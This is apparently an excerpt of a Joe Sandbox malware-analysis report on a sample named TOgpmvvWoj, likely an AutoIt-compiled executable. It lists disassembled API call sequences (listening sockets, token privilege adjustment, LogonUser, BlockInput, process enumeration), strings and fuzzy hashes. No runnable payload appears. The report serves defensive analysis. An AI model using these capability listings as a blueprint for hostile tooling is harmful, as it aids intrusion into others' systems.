                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                            • String ID: $@$SeShutdownPrivilege
                                            • API String ID: 2234035333-194228
                                            • Opcode ID: 107ee8210928fa312560f9c19cbf24b593862e9c21f3786e8ae7fef8e1e9a29d
                                            • Instruction ID: 3bc1098a1dd2052b4c2b09f5d26d6aa5827d75352bb063654825355c8a5ac079
                                            • Opcode Fuzzy Hash: 107ee8210928fa312560f9c19cbf24b593862e9c21f3786e8ae7fef8e1e9a29d
                                            • Instruction Fuzzy Hash: 97014C33694B152EE7285374EC4ABFA7258EB01342F24A132FD2FF20D2F9D01C804290
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __itow__swprintf
                                            • String ID: Oa
                                            • API String ID: 674341424-3945284152
                                            APIs
                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E865EF
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E865FE
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00E8661A
                                            • listen.WSOCK32(00000000,00000005), ref: 00E86629
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86643
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00E86657
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                            • String ID:
                                            • API String ID: 1279440585-0
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E119FA
                                            • GetSysColor.USER32(0000000F), ref: 00E11A4E
                                            • SetBkColor.GDI32(?,00000000), ref: 00E11A61
                                              • Part of subcall function 00E11290: DefDlgProcW.USER32(?,00000020,?), ref: 00E112D8
                                            Similarity
                                            • API ID: ColorProc$LongWindow
                                            • String ID:
                                            • API String ID: 3744519093-0
                                            APIs
                                              • Part of subcall function 00E880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E880CB
                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E86AB1
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86ADA
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00E86B13
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00E86B20
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00E86B34
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                            • String ID:
                                            • API String ID: 99427753-0
                                            Similarity
                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                            • String ID:
                                            • API String ID: 292994002-0
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E51D88,?), ref: 00E8C312
                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E8C324
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                            • API String ID: 2574300362-1816364905
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00E8F151
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00E8F15F
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • Process32NextW.KERNEL32(00000000,?), ref: 00E8F21F
                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E8F22E
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                            • String ID:
                                            • API String ID: 2576544623-0
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E740D1
                                            • _memset.LIBCMT ref: 00E740F2
                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E74144
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7414D
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                            • String ID:
                                            • API String ID: 1157408455-0
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E6EB19
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: ($|
                                            • API String ID: 1659193697-1631851259
                                            APIs
                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00E826D5
                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E8270C
                                            Similarity
                                            • API ID: Internet$AvailableDataFileQueryRead
                                            • String ID:
                                            • API String ID: 599397726-0
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7B5AE
                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E7B608
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E7B655
                                            Similarity
                                            • API ID: ErrorMode$DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1682464887-0
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                            • GetLastError.KERNEL32 ref: 00E68D47
                                            Similarity
                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                            • String ID:
                                            • API String ID: 1922334811-0
                                            APIs
                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E74C2C
                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E74C43
                                            • FreeSid.ADVAPI32(?), ref: 00E74C53
                                            Similarity
                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                            • String ID:
                                            • API String ID: 3429775523-0
                                            APIs
                                            • __time64.LIBCMT ref: 00E78B25
                                              • Part of subcall function 00E3543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E791F8,00000000,?,?,?,?,00E793A9,00000000,?), ref: 00E35443
                                              • Part of subcall function 00E3543A: __aulldiv.LIBCMT ref: 00E35463
                                            Similarity
                                            • API ID: Time$FileSystem__aulldiv__time64
                                            • String ID: 0u
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E7C966
                                            • FindClose.KERNEL32(00000000), ref: 00E7C996
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E8977D,?,00E9FB84,?), ref: 00E7A302
                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E8977D,?,00E9FB84,?), ref: 00E7A314
                                            Similarity
                                            • API ID: ErrorFormatLastMessage
                                            APIs
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E68851), ref: 00E68728
                                            • CloseHandle.KERNEL32(?,?,00E68851), ref: 00E6873A
                                            Similarity
                                            • API ID: AdjustCloseHandlePrivilegesToken
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E38F97,?,?,?,00000001), ref: 00E3A39A
                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E3A3A3
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            APIs
                                            • BlockInput.USER32(00000001), ref: 00E84218
                                            Similarity
                                            • API ID: BlockInput
                                            APIs
                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E74F18
                                            Similarity
                                            • API ID: mouse_event
                                            APIs
                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E688D1), ref: 00E68CB3
                                            Similarity
                                            • API ID: LogonUser
                                            APIs
                                            • GetUserNameW.ADVAPI32(?,?), ref: 00E52242
                                            Similarity
                                            • API ID: NameUser
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E3A36A
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction ID: 682c9b22ff7683bfa7acf1458b4dabef064d1f0a59b003f3327514d8e9d9c2a5
                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                            • Instruction Fuzzy Hash: 0C41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction ID: 642428498b6b112c16334def210240fb12dfd01b83cb72ed7a217a5dcbe48613
                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                            • Instruction Fuzzy Hash: 67019D78A04209EFCB44DF98C5909AEF7B5FB48310F248699E809A7741E730AE51DF90
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction ID: c9db98e25797c00c84c4b9829f3a7614cc951e48ce62fb26f9391008b6be2cea
                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                            • Instruction Fuzzy Hash: 2E019D78A04209EFCB48DF98C5909AEF7B5FF48310F248599E909A7741E730AE41DB90
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302068415.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_d40000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                            APIs
                                            • CharUpperBuffW.USER32(?,?,00E9F910), ref: 00E938AF
                                            • IsWindowVisible.USER32(?), ref: 00E938D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharUpperVisibleWindow
                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                            • API String ID: 4105515805-45149045
                                            • Opcode ID: 231cab3d6f4cf7e02020f230c18bb6823819b4e3674be052d84ff96ccab01262
                                            • Instruction ID: 94a72c80fc61026c7364e52c207a3d84557bde67400fad331b05da7f57a6e8c3
                                            • Opcode Fuzzy Hash: 231cab3d6f4cf7e02020f230c18bb6823819b4e3674be052d84ff96ccab01262
                                            • Instruction Fuzzy Hash: B3D163302043059BCF14EF20C556AAEBBE9AF94344F11645CB8967B3A3DB31EE4ACB51
                                            APIs
                                            • SetTextColor.GDI32(?,00000000), ref: 00E9A89F
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E9A8D0
                                            • GetSysColor.USER32(0000000F), ref: 00E9A8DC
                                            • SetBkColor.GDI32(?,000000FF), ref: 00E9A8F6
                                            • SelectObject.GDI32(?,?), ref: 00E9A905
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00E9A930
                                            • GetSysColor.USER32(00000010), ref: 00E9A938
                                            • CreateSolidBrush.GDI32(00000000), ref: 00E9A93F
                                            • FrameRect.USER32(?,?,00000000), ref: 00E9A94E
                                            • DeleteObject.GDI32(00000000), ref: 00E9A955
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00E9A9A0
                                            • FillRect.USER32(?,?,?), ref: 00E9A9D2
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E9A9FD
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(00000012), ref: 00E9AB99
                                              • Part of subcall function 00E9AB60: SetTextColor.GDI32(?,?), ref: 00E9AB9D
                                              • Part of subcall function 00E9AB60: GetSysColorBrush.USER32(0000000F), ref: 00E9ABB3
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(0000000F), ref: 00E9ABBE
                                              • Part of subcall function 00E9AB60: GetSysColor.USER32(00000011), ref: 00E9ABDB
                                              • Part of subcall function 00E9AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E9ABE9
                                              • Part of subcall function 00E9AB60: SelectObject.GDI32(?,00000000), ref: 00E9ABFA
                                              • Part of subcall function 00E9AB60: SetBkColor.GDI32(?,00000000), ref: 00E9AC03
                                              • Part of subcall function 00E9AB60: SelectObject.GDI32(?,?), ref: 00E9AC10
                                              • Part of subcall function 00E9AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00E9AC2F
                                              • Part of subcall function 00E9AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E9AC46
                                              • Part of subcall function 00E9AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00E9AC5B
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                            • String ID:
                                            • API String ID: 4124339563-0
                                            • Opcode ID: 872848e88e0c6b98f099f6da4cc40c60ed328910210f76bd056479525be25a82
                                            • Instruction ID: 38955404a93110be199f11533b3cbfb556b580690e87283e2afaafa87d9141f2
                                            • Opcode Fuzzy Hash: 872848e88e0c6b98f099f6da4cc40c60ed328910210f76bd056479525be25a82
                                            • Instruction Fuzzy Hash: 32A18271008301FFDB109F65DC08A6B7BA9FF88325F145A2BF962E61A1D771D948CB92
                                            APIs
                                            • DestroyWindow.USER32(?,?,?), ref: 00E12CA2
                                            • DeleteObject.GDI32(00000000), ref: 00E12CE8
                                            • DeleteObject.GDI32(00000000), ref: 00E12CF3
                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00E12CFE
                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00E12D09
                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E4C68B
                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E4C6C4
                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E4CAED
                                              • Part of subcall function 00E11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E12036,?,00000000,?,?,?,?,00E116CB,00000000,?), ref: 00E11B9A
                                            • SendMessageW.USER32(?,00001053), ref: 00E4CB2A
                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E4CB41
                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E4CB57
                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E4CB62
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                            • String ID: 0
                                            • API String ID: 464785882-4108050209
                                            • Opcode ID: efdc1efccf3350ef2f1aa991bbf5bfd0535c7329e92cd68da55b756d80db9b2d
                                            • Instruction ID: a35a155bc9169fa833ee470e29c4b22750933fbc134b72c1e119ade8afef33f5
                                            • Opcode Fuzzy Hash: efdc1efccf3350ef2f1aa991bbf5bfd0535c7329e92cd68da55b756d80db9b2d
                                            • Instruction Fuzzy Hash: E1129030601201EFDB54CF24D888BA9B7E5FF44304F64656EEA96EB262C731EC91DB91
                                            APIs
                                            • DestroyWindow.USER32(00000000), ref: 00E877F1
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E878B0
                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E878EE
                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E87900
                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E87946
                                            • GetClientRect.USER32(00000000,?), ref: 00E87952
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E87996
                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E879A5
                                            • GetStockObject.GDI32(00000011), ref: 00E879B5
                                            • SelectObject.GDI32(00000000,00000000), ref: 00E879B9
                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E879C9
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E879D2
                                            • DeleteDC.GDI32(00000000), ref: 00E879DB
                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E87A07
                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E87A1E
                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E87A59
                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E87A6D
                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E87A7E
                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E87AAE
                                            • GetStockObject.GDI32(00000011), ref: 00E87AB9
                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E87AC4
                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E87ACE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                            • API String ID: 2910397461-517079104
                                            • Opcode ID: dbe06263526c1cb3aabfad74da4dd69e6b6391fa8fa7df433d50e3853bd2965f
                                            • Instruction ID: ab08198a11e94c914e579f2c6b54802d58373ea579a88fc8e2455738f28eb050
                                            • Opcode Fuzzy Hash: dbe06263526c1cb3aabfad74da4dd69e6b6391fa8fa7df433d50e3853bd2965f
                                            • Instruction Fuzzy Hash: 21A17F71A40215BFEB149BA5DC4AFAEBBB9EB48710F104116FA19F72E1C770AD04CB60
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 00E7AF89
                                            • GetDriveTypeW.KERNEL32(?,00E9FAC0,?,\\.\,00E9F910), ref: 00E7B066
                                            • SetErrorMode.KERNEL32(00000000,00E9FAC0,?,\\.\,00E9F910), ref: 00E7B1C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DriveType
                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                            • API String ID: 2907320926-4222207086
                                            • Opcode ID: 5aa162132c0e009440380a46ea123384e1a65b2f8f0d486695e5b03d497d1edc
                                            • Instruction ID: efa796e6840883991e48e9704d269ff8e56f73b16ddedf1b87ec2de1a8497c0a
                                            • Opcode Fuzzy Hash: 5aa162132c0e009440380a46ea123384e1a65b2f8f0d486695e5b03d497d1edc
                                            • Instruction Fuzzy Hash: 9551D070685349EB8B04DB10CAA6FFD73B0BB54749768F02AE40EB7691C7369D42DB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __wcsnicmp
                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                            • API String ID: 1038674560-86951937
                                            • Opcode ID: 8a40e9bc9d8679f81242d1cc77bd911e8ee6f2a2b6dc33526f3c417860bb3242
                                            • Instruction ID: ebdb1f017fcc4288b70e8c26cd310edf2c01b24870d0f8fb4f8b70e8bd83ff48
                                            • Opcode Fuzzy Hash: 8a40e9bc9d8679f81242d1cc77bd911e8ee6f2a2b6dc33526f3c417860bb3242
                                            • Instruction Fuzzy Hash: 4D812671644305BACB20AF24DC86FEE7BE8BF15718F047065F945BA182EB60EA91C291
                                            APIs
                                            • GetSysColor.USER32(00000012), ref: 00E9AB99
                                            • SetTextColor.GDI32(?,?), ref: 00E9AB9D
                                            • GetSysColorBrush.USER32(0000000F), ref: 00E9ABB3
                                            • GetSysColor.USER32(0000000F), ref: 00E9ABBE
                                            • CreateSolidBrush.GDI32(?), ref: 00E9ABC3
                                            • GetSysColor.USER32(00000011), ref: 00E9ABDB
                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E9ABE9
                                            • SelectObject.GDI32(?,00000000), ref: 00E9ABFA
                                            • SetBkColor.GDI32(?,00000000), ref: 00E9AC03
                                            • SelectObject.GDI32(?,?), ref: 00E9AC10
                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00E9AC2F
                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E9AC46
                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00E9AC5B
                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E9ACA7
                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E9ACCE
                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00E9ACEC
                                            • DrawFocusRect.USER32(?,?), ref: 00E9ACF7
                                            • GetSysColor.USER32(00000011), ref: 00E9AD05
                                            • SetTextColor.GDI32(?,00000000), ref: 00E9AD0D
                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E9AD21
                                            • SelectObject.GDI32(?,00E9A869), ref: 00E9AD38
                                            • DeleteObject.GDI32(?), ref: 00E9AD43
                                            • SelectObject.GDI32(?,?), ref: 00E9AD49
                                            • DeleteObject.GDI32(?), ref: 00E9AD4E
                                            • SetTextColor.GDI32(?,?), ref: 00E9AD54
                                            • SetBkColor.GDI32(?,?), ref: 00E9AD5E
